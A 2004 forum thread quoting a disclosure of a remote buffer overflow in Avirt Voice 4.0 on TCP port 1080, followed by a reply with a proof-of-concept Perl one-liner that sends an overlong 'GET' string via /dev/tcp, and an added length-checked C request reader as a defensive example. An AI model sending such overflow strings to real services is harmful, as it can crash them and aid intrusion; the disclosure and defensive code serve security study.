Nexcess
Feb 24 2004, 06:53 AM
| QUOTE |
Application: Avirt Voice hxxp://www.avirt.com/
Version: 4.0
Bug: Remote Buffer Overflow
Author: Donato Ferrante e-mail: fdonato@autistici.org
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1. Description 2. The bug 3. The code 4. The fix
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
---------------- 1. Description: ----------------
Vendor's Description:
"Avirt Voice acts as an H.323 gateway between IP networks. It allows users to operate H.323 applications, like Microsoft NetMeeting, Intel Video Phone, or Netspeak Webphone, from behind a firewall. Because Voice is a software solution, it is more easily scalable and much less expensive than hardware alternatives."
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------ 2. The bug: ------------
The program doesn't manage the strings received on TCP port 1080 well. In fact, it will have a buffer overflow.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------- 3. The code: -------------
To test the vulnerability simply send to the server ( port 1080 ) a string like:
GET aaaa[ 1113 of a ]aaaa
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------ 4. The fix: ------------
Vendor was contacted. Bug will be fixed in the next version of Avirt Voice.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
T3cHn0b0y
Feb 24 2004, 09:50 AM
Thanks for the info m8! Let's see if we can develop some PoC.
bitwild
Feb 24 2004, 10:50 AM
PoC - unchecked :) - how about :
| CODE |
-su-2.05b# echo $BASH_VERSION
2.05b.0(1)-release
-su-2.05b# perl -e '{print "GET ";print "a"x"1113"}' >> /dev/tcp/127.0.0.1/1080
|
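The advisory quoted above attributes the overflow to unchecked handling of strings received on TCP port 1080. As an added example (not Avirt's code and not written by anyone in this thread), here is a length-checked request-line reader in C that rejects an over-long line instead of copying it. The 256-byte limit and all function names are assumptions, and the sample input is constructed in memory.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define REQ_LINE_MAX 256  /* assumed limit; the product's real buffer size is not on the page */

enum req_status { REQ_OK = 0, REQ_TOO_LONG = -1, REQ_INCOMPLETE = -2 };

/* Copy one LF-terminated request line (optional CR stripped) from the received
 * bytes into out. Never writes more than out_size bytes; NUL-terminates on REQ_OK. */
static enum req_status read_request_line(const char *rx, size_t rx_len,
                                         char *out, size_t out_size)
{
    const char *nl;
    size_t line_len;

    if (out_size == 0)
        return REQ_TOO_LONG;
    out[0] = '\0';
    nl = memchr(rx, '\n', rx_len);
    if (nl == NULL)  /* no terminator yet: wait, unless the sender already exceeded the limit */
        return rx_len >= out_size ? REQ_TOO_LONG : REQ_INCOMPLETE;
    line_len = (size_t)(nl - rx);
    if (line_len > 0 && rx[line_len - 1] == '\r')
        line_len--;
    if (line_len >= out_size)  /* reject rather than truncate or overflow */
        return REQ_TOO_LONG;
    memcpy(out, rx, line_len);
    out[line_len] = '\0';
    return REQ_OK;
}

/* Constructed sample input: "GET " + pad filler bytes, optionally CRLF-terminated. */
static enum req_status check_padded_get(size_t pad, int terminated)
{
    char rx[2048], line[REQ_LINE_MAX];
    size_t n = 4;

    if (pad > sizeof rx - 6)
        return REQ_TOO_LONG;
    memcpy(rx, "GET ", 4);
    memset(rx + n, 'a', pad); n += pad;
    if (terminated) { memcpy(rx + n, "\r\n", 2); n += 2; }
    return read_request_line(rx, n, line, sizeof line);
}

int main(void)
{
    printf("short=%d long=%d\n", check_padded_get(10, 1), check_padded_get(1113, 1));
    return 0;
}
```

A server using this pattern would close the connection or return an error on `REQ_TOO_LONG` rather than continuing to parse.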